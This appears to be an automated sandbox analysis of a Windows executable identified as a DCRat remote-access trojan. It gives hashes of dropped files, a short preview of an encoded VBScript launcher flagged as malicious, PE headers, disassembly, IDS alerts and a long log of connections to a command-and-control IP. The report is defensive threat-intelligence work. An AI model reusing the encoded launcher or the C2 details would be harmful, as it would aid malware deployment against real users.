                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................p...K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\Desktop\5Ixz5yVfS7.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):49
                Entropy (8bit):4.19870825257941
                Encrypted:false
                SSDEEP:3:5IlTVKdKqBVX0di:5IX7qBudi
                MD5:DB4D25A773EE938F539451FD566C88A9
                SHA1:C97BA1C8EC9617FFBD995395EF142E0A3C89AEA2
                SHA-256:056F774D8D53A657C2F4FDCE7AB0F582771F76E831A3F8890AFE5DC083B7596F
                SHA-512:5A99DDD8965D6CE1436ACF5371CABE4BB41DE830324B5FCE92FC74C7312C98DCB2CF1DD3C0D2B328E62B481BC34CA942D563B8B7D781ED7598FF7BA42ACC549F
                Malicious:false
                Reputation:low
                Preview:"%Temp%\ComponentfontintoDll\Bridgecontainer.exe"
                Process:C:\Users\user\Desktop\5Ixz5yVfS7.exe
                File Type:data
                Category:dropped
                Size (bytes):207
                Entropy (8bit):5.792659830467576
                Encrypted:false
                SSDEEP:6:GLwqK+NkLzWbHK/818nZNDd3RL1wQJRQdmQ/7Hif1:GiMCzWLKG4d3XBJbW7M
                MD5:E115EF6D0CA1F43393A02610609CDB14
                SHA1:09DA58489CA5BF69FB1C597B96D08997CC4EAFBC
                SHA-256:43C90790C5676FA543398A25C1485A8D5C08AF1A8411BBE0E8810785EE44AD29
                SHA-512:3B4C9BD9B92F7B078519523798839E03AC7A9CA0D8AB480E9BABDFA3C7141B0A75A6E4FA956D875D7CAF8B26CFD368D45F1C4F635AA7FD67F05923BFFE25550E
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                Reputation:low
                Preview:#@~^tgAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vvT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~JuP.:2uz;W:aW.nxD0GxDkUOKfV^&CZf3\p 4mYr~~!S~6ls/.GToAAA==^#~@.
                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):6.373996791003091
                TrID:
                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                • Win32 Executable (generic) a (10002005/4) 49.97%
                • Generic Win/DOS Executable (2004/3) 0.01%
                • DOS Executable Generic (2002/1) 0.01%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:5Ixz5yVfS7.exe
                File size:1'164'920 bytes
                MD5:7b4eccf10cc4fa7263646f2fce4d7f8b
                SHA1:06111e9aa4ae84c68208e3800ad757f1eb80c227
                SHA256:752b44a9225f3423d045835f61cedc897696680e2caeead0d472f367da14e898
                SHA512:f5a38968e235a8750eb5b18e4202bbb275d51e35a0461955720507adcb902b5f8a6d6b59b940f96df66800278fff3cd14e388811d57766d0dfc24f603879fb93
                SSDEEP:24576:U2G/nvxW3Ww0tNU2xxm8eFjhoiRQROImS/7xFPdp:UbA30NU+UtEj/9FD
                TLSH:01455A027E44CE12F4191633C6FF492447B4AC552AA6E72B7EBA376D55223937C0CACB
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..
                Icon Hash:1515d4d4442f2d2d
                Entrypoint:0x41ec40
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:fcf1390e9ce472c7270447fc5c61a0c1
                Instruction
                call 00007FDD48E3CC49h
                jmp 00007FDD48E3C65Dh
                cmp ecx, dword ptr [0043E668h]
                jne 00007FDD48E3C7D5h
                ret
                jmp 00007FDD48E3CDCEh
                int3
                int3
                int3
                int3
                int3
                push ebp
                mov ebp, esp
                push esi
                push dword ptr [ebp+08h]
                mov esi, ecx
                call 00007FDD48E2F567h
                mov dword ptr [esi], 00435580h
                mov eax, esi
                pop esi
                pop ebp
                retn 0004h
                and dword ptr [ecx+04h], 00000000h
                mov eax, ecx
                and dword ptr [ecx+08h], 00000000h
                mov dword ptr [ecx+04h], 00435588h
                mov dword ptr [ecx], 00435580h
                ret
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                lea eax, dword ptr [ecx+04h]
                mov dword ptr [ecx], 00435568h
                push eax
                call 00007FDD48E3F96Dh
                pop ecx
                ret
                push ebp
                mov ebp, esp
                sub esp, 0Ch
                lea ecx, dword ptr [ebp-0Ch]
                call 00007FDD48E2F4FEh
                push 0043B704h
                lea eax, dword ptr [ebp-0Ch]
                push eax
                call 00007FDD48E3F082h
                int3
                push ebp
                mov ebp, esp
                sub esp, 0Ch
                lea ecx, dword ptr [ebp-0Ch]
                call 00007FDD48E3C774h
                push 0043B91Ch
                lea eax, dword ptr [ebp-0Ch]
                push eax
                call 00007FDD48E3F065h
                int3
                jmp 00007FDD48E410B3h
                jmp dword ptr [00433260h]
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                push 00421EB0h
                push dword ptr fs:[00000000h]
                Programming Language:
                • [ C ] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729
                • [C++] VS2015 UPD3.1 build 24215
                • [EXP] VS2015 UPD3.1 build 24215
                • [RES] VS2015 UPD3 build 24213
                • [LNK] VS2015 UPD3.1 build 24215
                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x3c8200x34.rdata
                IMAGE_DIRECTORY_ENTRY_IMPORT0x3c8540x3c.rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x630000xdfd0.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x710000x2268.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x3aac00x54.rdata
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355080x40.rdata
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x330000x260.rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3bdc40x120.rdata
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x310ea0x31200c5bf61bbedb6ad471e9dc6266398e965False0.583959526081425data6.708075396341128IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rdata0x330000xa6120xa8007980b588d5b28128a2f3c36cabe2ce98False0.45284598214285715data5.221742709250668IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data0x3e0000x237280x1000201530c9e56f172adf2473053298d48fFalse0.36767578125data3.7088186669877685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .didat0x620000x1880x200c5d41d8f254f69e567595ab94266cfdcFalse0.4453125data3.2982538067961342IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc0x630000xdfd00xe000f6c0f34fae6331b50a7ad2efc4bfefdbFalse0.6370326450892857data6.6367506404157535IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc0x710000x22680x2400c7a942b723cb29d9c02f7c611b544b50False0.7681206597222222data6.5548620101740545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                NameRVASizeTypeLanguageCountryZLIB Complexity
                PNG0x636500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                PNG0x641980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                RT_ICON0x657480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                RT_ICON0x65cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                RT_ICON0x665580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                RT_ICON0x674000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                RT_ICON0x678680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                RT_ICON0x689100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                RT_ICON0x6aeb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                RT_DIALOG0x6f5880x286dataEnglishUnited States0.5092879256965944
                RT_DIALOG0x6f3580x13adataEnglishUnited States0.60828025477707
                RT_DIALOG0x6f4980xecdataEnglishUnited States0.6991525423728814
                RT_DIALOG0x6f2280x12edataEnglishUnited States0.5927152317880795
                RT_DIALOG0x6eef00x338dataEnglishUnited States0.45145631067961167
                RT_DIALOG0x6ec980x252dataEnglishUnited States0.5757575757575758
                RT_STRING0x6ff680x1e2dataEnglishUnited States0.3900414937759336
                RT_STRING0x701500x1ccdataEnglishUnited States0.4282608695652174
                RT_STRING0x703200x1b8dataEnglishUnited States0.45681818181818185
                RT_STRING0x704d80x146dataEnglishUnited States0.5153374233128835
                RT_STRING0x706200x446dataEnglishUnited States0.340036563071298
                RT_STRING0x70a680x166dataEnglishUnited States0.49162011173184356
                RT_STRING0x70bd00x152dataEnglishUnited States0.5059171597633136
                RT_STRING0x70d280x10adataEnglishUnited States0.49624060150375937
                RT_STRING0x70e380xbcdataEnglishUnited States0.6329787234042553
                RT_STRING0x70ef80xd6dataEnglishUnited States0.5747663551401869
                RT_GROUP_ICON0x6ec300x68dataEnglishUnited States0.7019230769230769
                RT_MANIFEST0x6f8100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333
                DLLImport
                KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc
                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States
                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                2025-01-02T05:17:06.085876+01002034194ET MALWARE DCRAT Activity (GET)1192.168.2.549704141.8.192.15180TCP
                2025-01-02T05:17:12.379192+01002850862ETPRO MALWARE DCRat Initial Checkin Server Response M41141.8.192.15180192.168.2.549706TCP
                2025-01-02T05:18:27.514248+01002850862ETPRO MALWARE DCRat Initial Checkin Server Response M41141.8.192.15180192.168.2.549987TCP
                2025-01-02T05:20:28.241324+01002850862ETPRO MALWARE DCRat Initial Checkin Server Response M41141.8.192.15180192.168.2.550009TCP
                TimestampSource PortDest PortSource IPDest IP
                Jan 2, 2025 05:17:05.233977079 CET4970480192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:05.238905907 CET8049704141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:05.239003897 CET4970480192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:05.239795923 CET4970480192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:05.244545937 CET8049704141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:06.085664988 CET8049704141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:06.085701942 CET8049704141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:06.085712910 CET8049704141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:06.085875988 CET4970480192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:06.171778917 CET8049704141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:06.224571943 CET4970480192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:06.470499039 CET4970480192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:06.472033024 CET4970580192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:06.475528955 CET8049704141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:06.475543976 CET8049704141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:06.476861000 CET8049705141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:06.476927042 CET4970580192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:06.477078915 CET4970580192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:06.481928110 CET8049705141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:06.688663960 CET8049704141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:06.740102053 CET4970480192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:07.152820110 CET8049705141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:07.158070087 CET4970480192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:07.158274889 CET4970580192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:07.163094997 CET8049705141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:07.163186073 CET8049705141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:07.163198948 CET8049704141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:07.163254976 CET4970480192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:07.370100021 CET8049705141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:07.411956072 CET4970580192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:11.693825006 CET4970580192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:11.695013046 CET4970680192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:11.698951960 CET8049705141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:11.699055910 CET4970580192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:11.699820042 CET8049706141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:11.699892044 CET4970680192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:11.700022936 CET4970680192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:11.704792976 CET8049706141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:11.704936981 CET8049706141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:12.373090982 CET8049706141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:12.374084949 CET4970680192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:12.379192114 CET8049706141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:12.379266024 CET4970680192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:17.382556915 CET4972480192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:17.387518883 CET8049724141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:17.388425112 CET4972480192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:17.388451099 CET4972480192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:17.393256903 CET8049724141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:17.393362999 CET8049724141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:18.150692940 CET8049724141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:18.193223953 CET4972480192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:23.162602901 CET4972480192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:23.163744926 CET4975780192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:23.167761087 CET8049724141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:23.167819977 CET4972480192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:23.168606997 CET8049757141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:23.168684006 CET4975780192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:23.168836117 CET4975780192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:23.173619986 CET8049757141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:23.173795938 CET8049757141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:23.844237089 CET8049757141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:23.896502018 CET4975780192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:27.707722902 CET8049757141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:27.707778931 CET4975780192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:28.851953983 CET4979880192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:28.856796026 CET8049798141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:28.856857061 CET4979880192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:28.857894897 CET4979880192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:28.862782955 CET8049798141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:28.862843037 CET8049798141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:29.604166031 CET8049798141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:29.646370888 CET4979880192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:34.615767002 CET4979880192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:34.616636992 CET4982980192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:34.620912075 CET8049798141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:34.620981932 CET4979880192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:34.621494055 CET8049829141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:34.621665955 CET4982980192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:34.621783972 CET4982980192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:34.626555920 CET8049829141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:34.626683950 CET8049829141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:35.325664043 CET8049829141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:35.380732059 CET4982980192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:40.336118937 CET4982980192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:40.336908102 CET4986780192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:40.341705084 CET8049867141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:40.341772079 CET4986780192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:40.341936111 CET4986780192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:40.342961073 CET8049829141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:40.343015909 CET4982980192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:40.346776962 CET8049867141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:40.346834898 CET8049867141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:41.044749022 CET8049867141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:41.099486113 CET4986780192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:46.053141117 CET4986780192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:46.053872108 CET4990680192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:46.058341980 CET8049867141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:46.058691025 CET8049906141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:46.058741093 CET4986780192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:46.058767080 CET4990680192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:46.058950901 CET4990680192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:46.063796043 CET8049906141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:46.063880920 CET8049906141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:46.779894114 CET8049906141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:46.833868980 CET4990680192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:51.790357113 CET4990680192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:51.794353008 CET4994080192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:51.795392036 CET8049906141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:51.795447111 CET4990680192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:51.799221992 CET8049940141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:51.799293995 CET4994080192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:51.802097082 CET4994080192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:51.806927919 CET8049940141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:51.807018995 CET8049940141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:52.626235008 CET8049940141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:52.677648067 CET4994080192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:57.631391048 CET4994080192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:57.632100105 CET4998180192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:57.636607885 CET8049940141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:57.636781931 CET4994080192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:57.636838913 CET8049981141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:57.636909962 CET4998180192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:57.637072086 CET4998180192.168.2.5141.8.192.151
                Jan 2, 2025 05:17:57.641824007 CET8049981141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:57.641946077 CET8049981141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:58.308748007 CET8049981141.8.192.151192.168.2.5
                Jan 2, 2025 05:17:58.349513054 CET4998180192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:03.324995041 CET4998180192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:03.330312967 CET8049981141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:03.330425024 CET4998180192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:03.339905024 CET4998780192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:03.344702005 CET8049987141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:03.344778061 CET4998780192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:03.347429037 CET4998780192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:03.352237940 CET8049987141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:03.352308989 CET8049987141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:04.023752928 CET8049987141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:04.068264961 CET4998780192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:09.038755894 CET4998880192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:09.044624090 CET8049988141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:09.044702053 CET4998880192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:09.044888973 CET4998880192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:09.050617933 CET8049988141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:09.050743103 CET8049988141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:09.719713926 CET8049988141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:09.771528006 CET4998880192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:14.725260019 CET4998880192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:14.726139069 CET4998980192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:14.730546951 CET8049988141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:14.730626106 CET4998880192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:14.731023073 CET8049989141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:14.731091022 CET4998980192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:14.732865095 CET4998980192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:14.737687111 CET8049989141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:14.737838984 CET8049989141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:15.414184093 CET8049989141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:15.458894014 CET4998980192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:20.428272009 CET4998980192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:20.428970098 CET4999080192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:20.433471918 CET8049989141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:20.433811903 CET8049990141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:20.433882952 CET4998980192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:20.433912039 CET4999080192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:20.434029102 CET4999080192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:20.438772917 CET8049990141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:20.439260006 CET8049990141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:21.116899014 CET8049990141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:21.162035942 CET4999080192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:26.131515026 CET4999080192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:26.132267952 CET4999180192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:26.136699915 CET8049990141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:26.136774063 CET4999080192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:26.137156963 CET8049991141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:26.137217045 CET4999180192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:26.137350082 CET4999180192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:26.147505045 CET8049991141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:26.147515059 CET8049991141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:26.821595907 CET8049991141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:26.865168095 CET4999180192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:27.514247894 CET8049987141.8.192.151192.168.2.5
